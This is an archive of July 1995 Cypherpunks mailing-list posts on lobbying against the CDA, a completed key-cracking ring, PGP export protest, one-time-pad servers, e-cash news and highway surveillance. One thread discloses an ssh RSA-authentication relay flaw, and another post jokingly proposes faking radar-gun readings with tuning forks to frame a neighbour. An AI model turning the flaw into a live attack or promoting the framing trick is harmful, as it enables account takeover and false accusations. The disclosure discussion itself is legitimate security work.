Content-Type: text/plain


On Thu, 13 Jul 1995, Timothy C. May wrote:

> 
> I'd hardly call my view "throwing in the towel." What I said clearly enough
> was that the Washingtonians can throw out repressive legislation much
> faster than we can--and I speak in terms of "we" as being the EFF, EPIC,
> NRA, ACLU, etc., and _not_ the Cyherpunks, who have no lobbying activities
> to speak of.

I'm glad you brought this up, Tim, because Pat Farrell, Carl Ellison, and
I have been discussing the possiblility of doing just that over the past
week or so.  The three of us, in addition to many others (we like to call
ourselves "The Mid-Atlantic Cypherpunks") are very near DC and thought we
might take advantage of this on behalf of others who don't have the luxury
of living near their legislators. 

Our idea (and it was originally limited to lobbying against the CDA, but
we can expand it now to lobby against that and S.974) was to have Cypherpunks
send letters (yes, authentic _snail mail_) to a Cypherpunk willing to go
deliver it in person, (namely me) and talk to whoever is there, be it the
congressperson or one of his/her aides.  The strategy of this action would
be to say,"hello, we represent <insert your organization here> and we
oppose <insert appropriate legislation title here> and we feel this way
because <insert very reasonable and diplomatic explanations in easy,
mono-syllabic words so that the congresscritter can understand here> and
here is a letter from one of your constituents who feels the same way we
do."  A simple lobby. 

I thought this might be effective because it seems that a lot of
representatives are difficult to get in touch with, since not all of them
have e-mail addresses.  I think there is a certain advantage in this kind
of action from an educational standpoint, considering that the House
doesn't seem to have a strong backer for this bill like the Senate did,
and the many Congresscritters who know nothing about the net only need
someone to explain the consequences of such a bill to them.  Furthermore,
to those ignorant of the net and its ways, a printed out list of names and
e-mail addresses collected through the web is completely foreign and
perhaps intimidating to them, and therefore not all that helpful to us,
IMHO.  Hand-signed letters (or hand-written, if your printing is more
legible than mine) in good, old-fashioned envelopes is just what critters
of this sort need to see. 

If any US citizens here would like me (and hopefully some older, wiser 
cypherpunks willing to join me on this trip) to deliver a letter to their 
congressperson please send a letter to this address:

                          The Hon. Whoever
                        c/o Kathleen M. Ellis
                           TSU box 898
                        Towson State University
                         8000 York Road
                          Towson, MD  21204

On the envelope you must include:

	The name of the congressperson (if I have to open the letter to be able 
			to tell who it is meant for it'll lose some of its 
			authenticity)

	My full address (yes, all five lines of it, or i'll never get it)

	If you can get it, the office location of representative 
			(building name and room number) printed on the 
			back or something, if you can't find it don't 
			worry, I'll find it, but if you can find it I'd 
			appreciate it.  You can get it at the URL below.

	A return address

	A postmark from your district

The letter must have:

	The specific bill you are against; its number, title, and sponsors 
			(the CDA is H.R.1004/S.652 sponsored by 
			Senator James Exon, from Nebraska)

	Possible alternatives (my suggestion is H.R. 1978, sponsored by 
			Cox and Wyden)

	A polite introuduction, a concise body, and a gracious 
			conclusion :). 

	Your address and signature.

If you need more information for your letter, good URLs on the subject are:

http://www.cdt.org/cdw.html
http://www.cdt.org/petition.html
http://www.eff.org/pub/EFF/Issues/censorship/Exon_bill/
http://uvacs.cs.virginia.edu/~hwh6k/public/S314_stuff.html
http://www.phantom.com/~slowdog
http://www.panix.com/vtw/exon/

If you don't know who your representative is, try to find her/him through

http://www.house.gov

and look for a familiar looking name from your state.  Unfortunately 
there's no "point-and-click" US map to refer to to find out which 
district is yours, but you should be able to find out fairly easily by 
looking for familiar names.  If you really get stuck, try your local 
League of Women Voters.

The main thing is, I need these letters soon.  In order to have a shot at
getting to talk to anyone, I must make appointments with the offices of
the respective representatives.  The house is expected to vote on this
topic any day now; the clock's a-ticking.  I ask that all letters be sent
so that I can recieve them by July 23rd.  I aim to raid congress on
Tuesday, July 25th.  This date could be changed, depending on the definite
responses I get from people willing to help. 

I have lobbied before, and I'm up to the task, but it would be nice to
have some other politically-oriented cypherpunks along for, at the very
least, moral support.  Anybody interested, Please Please Please send me
some e-mail.  Carl or Pat might go, and if we get enough people to help we 
can split the workload among teams.

If anyone has comments/questions/suggestions, don't hesitate.  I'd
appreciate whatever isn't necesary to go up on the list to be sent to me
privately, so's I don't get into trouble for "inciting spam". 

-=Kathleen M. Ellis=-

kelli@zeus.towson.edu              http://zeus.towson.edu/~kelli/
GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- 
M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 13 Jul 95 23:08:08 PDT
To: cypherpunks@toad.com
Subject: Looks like "Cypherpunks Key Cracking Ring" is done .....
Message-ID: <"swan.cl.cam.:128710:950714060757"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I noticed that http://dcs.ex.ac.uk/~aba/percent.html was reporting:

                                                            Percentage complete

                              PERCENTAGE COMPLETE

   4094 / 4096 = 100.6 percent

which looked a bit odd to me :-) Do I detect a Pentium at work ??

Anyway, I grabbed a 29 bit address space and got:

ffe0000000 29

   THATS IT FOLKS! ALL DONE!

and now it reports:
                                                            Percentage complete

                              PERCENTAGE COMPLETE

   4096 / 4096 = 100.7 percent




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Fri, 14 Jul 95 06:40:38 PDT
To: frogfarm@yakko.cs.wmich.edu
Subject: Re: Suing/Reputations (was: Root Causes)
Message-ID: <199507141348.IAA09516@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Thus did FrogFarm (?? :-) bespake:

... <legal cites excised> ...

This sounds like what I was thinking of.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Fri, 14 Jul 95 05:41:09 PDT
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: speeding detected by civilians
In-Reply-To: <199507132101.OAA27319@netcom12.netcom.com>
Message-ID: <199507141241.IAA24832@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of Vladimir Z. Nuri:
: 
: Vernon Hills, IL.
: 
: Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
: citizens to check out radar guns from the local police department to 
: catch speeders in their community. The radar guns are combined with 
: cameras in order to instantaneously capture the car, license number, and the 
: rate of speed. The citizens can check out the units for a week at a time. The 
: police have stated that they, at this time, will use the data to issue 
: warning letters to the violaters.
: 

Got a neighbor you don't like?  Rent one of these here radar guns and
get a set of tuning forks.  Set up the unit to catch your target, and then
just hold a tuning fork up in front of the unit (but out of range of the 
mounted camera).

PS -- Didn't traffic cops have one of the highest rates of testicular
cancer by occupation due to the widespread habit of resting radar guns in
their laps without switching them off?

- -----
#include <std_disclaimer.h>

Mark Rogaski           100,000 lemmings     rogaski@phobos.lib.iup.edu 
aka Doc, wendigo        can't be wrong!     http://www.lib.iup.edu/~rogaski/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAZlyx0c4/pqJauBAQHysAQAtEsBrdEJ9Esiybu9L8/398oaALrWGHuz
5UeeIfeaXEsG+c/Ns3T7pK47kRGNt5aa/xsT++sC0vqzXgWwZU4UnIMF5Lic8tsW
c35+EML7CEK77EvLzqwYMheowSptHKMGhwy0GhBFXl1vA0zCP66Hho3RstkFEDeg
wNIiyJQzG10=
=TGLu
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Fri, 14 Jul 95 06:49:27 PDT
To: cypherpunks@toad.com
Subject: Re: OTP server..
In-Reply-To: <9507140235.AA13456@snark.imsi.com>
Message-ID: <doug-9506141349.AA0110320@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger writes:
>
>Doug Hughes writes:
>> How about WWW one time pad servers? You browse to your
>> favorite OTP server, which has a random number generator
>> running in the background. You tell it to give you a block
>> of X bytes, and mail it to persons 1, 2, 3, ... N.
>
>Do I get you wrong, or are you proposing the mailing of one time pads
>in the clear?
>
Not necessarily. It could be sent any number of different ways.
Heck, you could mail (email, US, fedex) a bunch of passphrases
or whatever to a site (as an extreme example) to xor with the random
number string. They send you the product, you xor with your passphrases
in the appropriate order, and you have the true random number string.
 Of course the feds could just get a court order and snarf all your
passphrases or keys if it was in this country. People would probably
be better off using a server in another country and having the pad
sent to them encrypted or hashed in some fashion.

>> Enough of these things would be REALLY tough to monitor...
>
>The NSA is willing to monitor virtually all international
>telecommunications traffic and try to figure out whats interesting. I
>doubt this poses much of a challenge to them. Not to mention the fact
>that it probably wouldn't pose much of a challenge to *me* given a set
>of wiretaps and I have virtually no resources...
>

What if we just call them random number servers? Does that make them
uninteresting? What if there are dozens or hundreds of them receiving
thousands or 10's of thousands of connections a day? (Of course this
couldn't happen overnight. :) )
 After all, there are plenty of good purposes to which you can put
a random number, but a OTP is probably suspicious enough to warrant
scrutiny.
 Maybe it's all too much work for too little value.  All you need is
one byte or int, or whatever to xor with the RN before it's send to
you over the length of the int. Securely getting these bytes/keys
to the server might be tricky. Maybe it's impossible.  US Mail is
still guaranteed to be private.. (don't everybody laugh at once. ;) )

 Okay, assuming that the OTP idea just won't fly, is a general purpose
random number generating web site, or internet service of interest?
It could be a useful thing for a seed for individuals who want to do
their own OTP-ing. (Hey stan, I'll get us both an RN from the server
on the net, XOR each byte with 0x3e and will use that as an OTP for
a secret message). For frequent use it might be a huge bust
because you'd need a secure channel to get a secure channel.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 14 Jul 95 06:23:11 PDT
To: cypherpunks@toad.com
Subject: Checkfree/Cybercash Press release
Message-ID: <v02120d00ac2c20283a51@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 14 Jul 1995 03:42:07 -0700
>From: Davidwfox@eworld.com
>To: www-buyinfo@allegra.att.com, e-payment@bellcore.com
>Subject: Checkfree/Cybercash Press release
>
>CHECKFREE AND CYBERCASH JOIN FORCES TO DELIVER COMPREHENSIVE ELECTRONIC COM
>
>       Consumers can conduct Internet transactions using checks,
>                       credit cards or cash
>
>    BOSTON, July 13 /PRNewswire/ -- Checkfree Corporation and CyberCash,
>Inc. announced today at the Interactive Services Association conference
>that they will cooperatively develop and market products and services
>that will allow consumers to safely conduct payment transactions, in
>real time, over the Internet using credit cards, debit cards, checks or
>cash.
>    Checkfree, the nation's leading provider of electronic commerce
>services, will license technology from CyberCash, a leader in secure,
>end-to-end Internet payment systems.  Checkfree will integrate
>CyberCash's high level security features and ability to conduct cash
>transactions into the Checkfree Wallet(TM), creating a single solution
>for electronic payment transactions that offers checks, credit cards,
>cash, coin or micropayments.
>    "Partnering with CyberCash was the logical choice for Checkfree,"
>says Pete Kight, founder and CEO of Checkfree.  "Checkfree is committed
>to leading the way for electronic commerce, and providing plug and play
>Internet transaction solutions.  The Checkfree Wallet(TM) is now an even
>more attractive transaction platform for both consumers and merchants."
>    The Checkfree Wallet(TM) was introduced in April to allow consumers
>to purchases goods and services from on-line merchants in a safe,
>convenient and familiar manner.  The Checkfree Wallet(TM) does not
>require prior registration with merchants, and on-line shoppers pay no
>fees or transaction service charges.  With the addition of CyberCash's
>technology consumers will be able to utilize cash securely over the
>Internet and merchants will receive authorization in real time.  In
>addition, merchants will be able to accept payments from any on-line
>consumers, regardless of the server or browser they are using.
>    "Checkfree's long, successful record of developing applications for
>home banking and electronic bill payment is a perfect complement to
>CyberCash's secure Internet transaction and electronic cash expertise,"
>said Magdalena Yesil, vice president of marketing for CyberCash.
>"Together we can offer a complete array of payment tools that allow
>consumers to conduct spontaneous transactions and pay bills via the
>Internet."
>    Checkfree and CyberCash will focus on developing products that can
>be easily integrated into any browser system and merchant server.  The
>new Internet transaction product offering, which will be co-branded by
>Checkfree and CyberCash, is scheduled for release this fall.  The
>product will initially be available free-of-charge via NetCom's
>NetCruiser Internet browser as well as other leading Internet browsers.
>Merchant interest to date also includes ID Software, the developers of
>Doom(TM).
>
>    About CyberCash
>    CyberCash, Inc. of Reston, Virginia, was founded in August 1994 to
>partner with financial institutions and providers of goods and services
>to deliver secure Internet payment systems.  The CyberCash approach is
>based on establishing a trusted link between the seeming unpredictable
>world of cyberspace and the traditional banking world.  CyberCash serves
>as a conduit through which payments can be transported easily, safely
>and instantaneously between buyers, sellers and their banks.
>    The CyberCash system operates on top of any general security system
>such as SSL or Secure HTTP.  CyberCash beta software is currently
>available free-of-charge and can be downloaded from the company's WWW
>server at http://www.cybercash.com.  The company's initial service that
>accepts payments using any major credit card is scheduled for full
>commercial deployment this summer.  Electronic cash services are
>expected by the end of 1995.
>    CyberCash's principal founders, Bill Melton and Dan Lynch, have
>brought together a team with unparalleled experience in credit card and
>debit card automation, internet telecommunications and security.  In
>April, CyberCash was chosen by Interactive Age as one of the 100 Best
>Business Web Sites.  For further information about CyberCash, access its
>WWW server or call 800-9CYBER1.
>
>    About Checkfree
>    Checkfree Corporation, the nation's leading electronic commerce
>company, last year processed more than $6 billion in payments for
>consumers and corporate clients, with more than six million consumers
>and one million businesses benefiting from its services.  Checkfree
>serves consumers, business and financial institutions with a wide array
>of product and service offerings, each finely tuned to the specific
>needs of its users.  All leverage Checkfree's extensive technology
>infrastructure which includes its patented and proven electronic bill
>payment system.  Founded in 1981, Checkfree Corporation is headquartered
>in Columbus, Ohio, where it employs 370 full-time associates.  Checkfree
>is privately held.
>    For additional information about Checkfree, access its worldwide web
>server at: http://www.checkfree.com
>    -0-                          7/13/95
>/CONTACT:  Jennifer Sims, 415-904-7070, ext. 275 or
><jsims@accesspr.com>, or Nicol Davis, 415-904 7070, ext  281, or
><ndavis@accesspr.com>, both of Access Public Relations, for Checkfree;
>or Susan Ice of Thomas Associates, 415-325-6236, or susani@thomaspr.com
>for CyberCash, Inc./
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Fri, 14 Jul 95 06:29:35 PDT
To: cypherpunks@toad.com
Subject: RE: Fight, or Roll Over?
Message-ID: <34125.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Thu, 13 Jul 1995 02:41:12 -0800,
  cman@communities.com (Douglas Barnes)  writes:
> Since the Anti-Electronic Racketeering Act of 1995 might as well
> be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
> Tim throw in the towel already, when the bill hasn't even made it
> through committee yet.

OK, lets start some traditional politics.

Anyone know what commitee has jurisdiction?

Then the next step is who is on the commitee?

Then which cypherpunks are constituents of the commitee members?

At least some on the list write software for a living, or run ISPs and this
could effect their livelihood. Talk economic impact, not buzzwords
like "freedom" and apple pie.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Fri, 14 Jul 95 06:35:48 PDT
To: hal9001@panix.com
Subject: Re: Eudora MacPGP Woes
Message-ID: <9507141334.AA07025@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain



|   From: "Robert A. Rosenberg" <hal9001@panix.com>
|   Subject: Re: Eudora MacPGP Woes
|   
|   At 14:40 7/8/95, Black Unicorn wrote:
|   >I have noticed that an X-Attachement: header is added, but I have no idea
|   >how to remove it without opening the Eudora outbox with teachtext or
|   >something.
|   
|   Highlight the file name on the attachments line and hit delete to remove an
|   attached file request.

I guess I'm still confused about why there's an X-Attachment: header being
added. If the file is being generated by MacPGP without using the Applescript,
you can simply open the resulting encoded file (provided it is being ascii-
armored) from within Eudora then copy and paste it into an open Compose
window. Voila. No X-Attachment: header. If you delete the file name on the
attachments line, it also removes the attachment.

Mr. Unicorn: have you had any luck with the Applescript? You might try
booting without extensions (except for Applescript) and open Eudora
off-line and keep trying. 

Hope this helps,
Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Fri, 14 Jul 95 06:51:42 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: Ssh security hole?
In-Reply-To: <199507132303.CAA18383@shadows.cs.hut.fi>
Message-ID: <Pine.A32.3.91.950714094431.11806J-100000@JAGUAR.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jul 1995, Tatu Ylonen wrote:

> I think you are right in your analysis.  There is indeed a problem
> with RSA authentication.  Basically what this means is that if you log
> into a corrupt host, that host can at the same time log into another
> host with your account (by fooling you to answer to the request)
> provided that you use the same RSA identity for both hosts.

Bruce Schnier calls this the GrandMaster Problem in the Applied Crypto 
section on Zero Knowledge Authentication.

This can be skewed by requiring synchroneous transmissions within a very 
small synchronized time window.


Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  

Original message follows:
_______________________________________________________________
> A workaround is to use a different identity for each host you use.
> The default identity can be specified on a per-host basis in the
> configuration file, or by -i options.
> 
> And, yes, I think the same problem might occur with client host
> authentication.  Though, there you would still have to do IP-spoofing,
> DNS spoofing or similar to get through (breaking RSA based host client
> effectively reduces RhostsRSAAuthentication to conventional .rhosts
> authentication).
> 
> The protocol will need to be changed somewhat because of this.  I'll
> think about it tomorrow and let you say you opinion about it.
> 
> Thanks!
> 
>     Tatu Ylonen <ylo@cs.hut.fi>
> 
> Date: Thu, 13 Jul 1995 13:08:15 -0700
> From: David Mazieres <mazieres@pa.dec.com>
> To: ssh-bugs@cs.hut.fi
> Cc: rtm@eecs.harvard.edu, dm@eecs.harvard.edu, tbl@eecs.harvard.edu
> Subject: Ssh security hole?
> 
> I believe there is a serious problem with the RSA authentication
> scheeme used in ssh, but then again I could be misreading the proposed
> RFC.  Is the following really the case?
> 
> As I understand the protocol, here is what happens during SSH_AUTH_RSA
> authentication.
> 
> Suppose the holder of SKu, is allowed access to account U on machine B
> (which holds SKb).  Both PKu and PKb are widely known.  In addition,
> machine B has a session key, PKs, which changes every hour.  When U on
> machine A wants to log into machine B, here's what I think happens
> based on my reading of the RFC:
> 
> A -> B: A
> 
> B -> A: (PKb, PKs, COOKIE)
> 	[A flags an error if PKb is not the stored value.]
> 
> A -> B: (COOKIE, {{Kab}_PKs}_PKb)
> A -> B: {U}_Kab
> A -> B: {PKu}_Kab
> 	[B aborts if SKu is not allowed access to account U.]
> 
> B -> A: {{N}_PKu}_Kab
> 
> A -> B: {{N}_MD5}_Kab (*)
> 	[B aborts if the MD5 hash is invalid.]
> 
> B -> A: access to acount U with all data encrypted by Kab.
> 
> The problem is, suppose U actually wanted to log into machine C, which
> was maintained by an untrusted person.  The person maintaining C could
> initiate a connection to B the minute U tried to log into C.  When
> given a challenge {{N}_PKu}_Kbc, C could simply give this to A as the
> challenge to respond to, and then forward the response to B.
> 
> To fix the problem, A must at the very least include B in the
> response line marked (*).  I have reason to believe (after having just
> seen a lecture on authentication), that you might even need to include
> more.  A safe bet might be (but then again I am no expert):
> 
> A -> B: {(N, A, B, Kab)}_MD5
> 
> I think similar problems arise for the other authentication methods.
> 
> Other than that, though, I am really impressed by by ssh.  It's easy
> to install and easy to use.  In fact, it is even more convenient to
> use than standard rsh, because the X forwarding happens
> automatically.
> 
> Thanks for such a great package!
> 
> David
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 14 Jul 95 09:50:49 PDT
To: cypherpunks@toad.com
Subject: highway monitoring
Message-ID: <199507141649.JAA27462@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


some info on highway monitoring/tracking programs starting up..
all with major privacy implications...

------- Forwarded Message
Date: Mon, 10 Jul 1995 18:40:55 -0700
From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: Intelligent Vehicle-Highway Systems   (60K bytes)

[Frank Durand is a concerned citizen in Washington State who is
campaigning to require public discussion before the state adopts a
far-reaching "intelligent vehicle-highway systems" plan.  Some of the
state's plans raise questions about privacy (among other things).  He
recently sent me the enclosed document, which he got from Peter Marshall
<rocque@seanews.akita.com> from KSER Public Affairs in Seattle.  It is
a status report on the state Department of Transportation's advanced
technology projects, and it conveys a vivid sense of how the bureaucrats
and their industry partners are thinking.  I would encourage everybody
to call up their local state (or provincial or national) Department of
Transportation or regional transportation authority, ask to speak to
the expert on IVHS (or, in most countries besides the US, "transport
informatics"), and politely ask for the current status report on that
jurisdiction's advanced transportation technology projects.  (If they
tell you it doesn't exist, they're confused or playing bureaucratic games.
Perhaps you didn't ask for it by the right name.  Persist.)  See if you
can get the report in electronic form; otherwise get it in paper form and
get someone to scan it.  The potential privacy problems with these systems
can all be solved without significant sacrifices in functionality or cost,
so far as I can tell, through suitable choices of technology -- provided
the people in charge have been sensitized to the issues and persuaded to
take the effort to do it in the right way rather than the convenient way.
This is an urgent issue -- these plans are getting set in stone throughout
most of the world RIGHT NOW.  Let me know what you come up with.  ITS
America, by the way, is the trade association of US IVHS suppliers; it is
also an advisory board to the US Department of Transportation.  I'll be
leaving for a meeting on IVHS privacy issues at ITS America on July 22nd.
If you come up with any relevant information, it would be great if you
could send it to me by then.  Or else post details on the Privacy Digest,
privacy@vortex.com.  -- Phil Agre, pagre@ucsd.edu]

Date: Thu, 29 Jun 1995 13:57:15 -0700
From: fwd@ix.netcom.com (Franklin W. Durand)
To: pagre@ucsd.edu
Subject: Washington IVHS Status Report - June 1995

[...]

P.S.  Here is a little interesting trivia (some you know) regarding 
Washington State's links to ITS America: 

* Jack Kay is Chair of ITS America's Executive Committe - JHK & Associates   
wrote "Venture Washington" for WSDOT.

* Les Jacobson is  Chair of ITS America's ATMS Technical Committee - Les 
Jacobsen is in Seattle and work for WSDOT.

* Walter Zavoli of Etak is Chair ITS America's Personal Portable Advanced 
Travelor Information Systems Technical Committee - Etak is in partnership 
with WSDOT, Metro (Seattle), IBM and Delco on the SWIFT Project (Seattle Wide 
Area Information Technology) in Seattle which received and $7 million USDOT 
grant for the project.

* Lawrence Yermack of Parson Brinkerhoff International is Chair of ITS 
America's ETTM (Electronic Toll and Traffic Management) Technical Committee
- - - Parsons Brinkerhoff is one of the partners in Washington Transportation 
Partners (developers for the Evergreen Point Bridge Project in Seattle).

- - ------------------------------------------------------------------------------


Advanced Technology Branch Status Report	1	June, 1995

Status Report
of Active Projects
June 1995

WSDOT
Advanced Technology Branch
Washington State Transportation Center
Mail Stop 354802
1107 NE 45th Street, Suite 535
Seattle, WA  98105-4631
(206) 543-3331
Fax (206) 685-0767

ADVANCED TECHNOLOGY BRANCH 
Status Report of Active Projects
Washington State Department of Transportation
JUNE 1995
Table of Contents
HOV, TDM, and Related Projects	1
Travel Time Video Test	1
I-90 Lane Conversion.	1
HOV Lane Evaluation and Monitoring.	2
HOV Lane Evaluation and Monitoring (Phase II).	2
I-5 South HOV Lane Accident Analysis	3
Intercounty Carpool Profile.	3
An Analysis of Factors Accounting for Successes and Failures in the 
Acceptance and Utilization of Employer-Based TDM Programs.	3
Incident Management Projects	3
Incident Response Data Base.	3
Evaluation and Application of Washington State's Incident Response Guide.	4
Incident Management Training for WSDOT Personnel.	4
The Use of Total Station Surveying Equipment for Accident Investigation: 
A National Perspective.	4
ITS Projects	4
North Seattle Advanced Traffic Management System	4
BusView	5
Traffic Data Acquisition and Distribution (TDAD)	5
Puget Sound Help Me (PuSHME) Operational Test	5
A Real Time Traveler Information System for Reducing Urban Freeway 
Congestion, Expansion, Implementation, and Evaluation.	5
Improved Congestion Prediction Algorithm.	6
Improved Error Detection and Incident Detection Using Prediction 
Techniques and Video Imaging.	6
Bellevue Smart Traveler Using Traveler Information to Reduce Downtown SOV 
Commuting.	6
In-Vehicle Signing and Variable Speed Limit Demonstration.	7
Seattle to Portland Inter-city IVHS Corridor Study and Communication Plan	7
Portland to Boise ITS Corridor Study	7
Seattle to Vancouver, B.C., and Seattle to Spokane ITS Corridor Study	8
Assessment of ATIS in Washington State.	8
IVHS Data and Information Structure.	8
Investigation of Video Image Tracking.	8
IVHS Backbone Design and Demonstration.	9
Demonstration of ATIS/ATMS Data Fusion in a Regional IVHS.	9
IVHS - Network and Data Fusion.	9
Investigation of Automatic Vehicle Location Systems for Traveler 
Information.	9
Ramp Control via Neural Network Control.	9
Fuzzy Logic Ramp metering.	10
SWIFT - Seattle Wide-area Information For Travelers.	10
SWIFT Smart Traveler.	10
NEXRAD NEXt Generation Weather RADar.	10
Increasing Awareness of Transportation Options Through Riderlink.	10
Community Transit Arterial System Area-Wide Priority (CT ASAP)	11
Additional ITS Projects	11
Regional Automated Trip Planning.	11
Regional Ridematch.	11
Regional Ridematch Hotline.	11
Regional Fare Integration Project.	11
Smart Bus.	12
Other Projects	12
Traffic Congestion Monitoring-Urban Areas.	12
ENTERPRISE.	12
Accident Risks Using Roadway Geometrics.	13
Advanced Transportation Technology Application Policy Plan.	13

ADVANCED TECHNOLOGY BRANCH 
Status Report of Active Projects
Washington State Department of Transportation
June 1995
At the beginning of each project description, one or two names are listed 
to call for further information.  The first name is the WSDOT TRAC person 
or the Metro person.  When a second name is listed, it is usually the 
principal investigator (P.I.).  The phone numbers for each person follow:

PHONE NUMBERS	phone number
WSDOT TRAC	
Pete Briglia		(206) 543-3331
Morgan Balogh	(206) 543-0078
Eldon L. Jacobson	(206) 685-3187
Bill Legg		(206) 543-3332
Larry Senn		(206) 543-6741
U.W./W.S.U.  P.I.	
Earl Butterfield	(206) 685-2123
Dan Dailey		(206) 543-2493
Mark Hallenbeck	(206) 543-6261
Mark Haselkorn	(206) 543-2577
Fred Mannering	(206) 543-8935
Nancy L. Nihan	(206) 543-9639
G. Scott Rutherford	(206) 685-2481
Jan Spyridakis	(206) 685-1557
Cy Ulberg		(206) 543-0365
Deirdre Meldrum	(206) 685-7639
Tom Seliga		(206) 685-7092
King County Metro	
Catherine Bradshaw(206) 684-1770
Wayne Watanabe	(206) 684-1633
Roland Bradley	(206) 689-3490
Candace Carlson	(206) 684-1562
David Cantey	(206) 684-6794

Each of the following project descriptions includes recent changes in 
bold face type, usually at the end of each report, while previously 
reported information has been changed to unbold.


.c.HOV, TDM, and Related Projects

%	.c.Travel Time Video Test.;  (Eldon L. Jacobson) This project is 
studying the use of high resolution video cameras and computer software 
that subsequently analyzes the video tapes to compute vehicle travel 
times using the matching license plate method.  WSDOT has arranged for 
Transformation Systems, Inc., of Houston, Texas to perform the work.  The 
field work will be done during June 19-22, 1995, with the analysis and 
the report received about a month later.  We will be looking at travel 
times between HOV lanes and GP lanes.

%	.c.I-90 Lane Conversion.;  (Eldon L. Jacobson or Fred Mannering) 
This project studied the impacts of converting a general purpose lane to 
an HOV lane on I-90 between Issaquah and Eastgate (sometimes called 
take-a-lane).  The westbound conversion (and added lane) was fully 
operational on December 6, 1993.  During January, 1994, the lane 
configuration was revised in the Mercer Slough area, creating a 
bottleneck section on westbound I-90 that has two general purpose lanes 
plus the HOV lane.  After a couple of months the complaints quieted, and 
people appear to have become used to the situation.  On June 27, 1994, 
westbound I-90 ramp metering was implemented.  Some video tape for the 
RafterS data survey was collected the week before the ramp meter 
turn-on.  The draft report was circulated for review late November, 
1994.  Comments have been incorporated into the final report by the P.I.  
The final report is complete and has been published.  Project complete.

%	.c.HOV Lane Evaluation and Monitoring.;  (Eldon L. Jacobson or Cy 
Ulberg) This project will produce the first annual (July, 1992 thru June, 
1993) HOV system evaluation, on the basis of the methodology developed in 
the above project.  It is important to periodically monitor and evaluate 
existing HOV lanes in order to make decisions about the operation of 
existing HOV lanes and about the best location to construct future HOV 
lanes.  The evaluation will consider HOV lane usage, violations, safety, 
time savings, capacity improvements, modal shifts, route shifts, 
enforcement issues, cost effectiveness, and public opinion.
The project will build on existing information to construct a database 
for evaluation of HOV lanes.  Quarterly, annual, and biennial reports 
will be published.  At the end of the research, recommendations will be 
made about the type of data necessary to do an HOV lane evaluation, the 
data collection methodology, what agencies should be involved in HOV lane 
evaluations, and the timing and format of HOV evaluation reports.
Surveys for I-5 South of Seattle (the Southcenter hill area to Midway) 
were mailed out to motorists the week of February 10, 1992.  Opinion 
surveys for Metro bus drivers in the I-5 South corridor were handed out 
in late, February, 1992, and returned in early March, 1992.  All surveys 
have been tabulated and summarized.
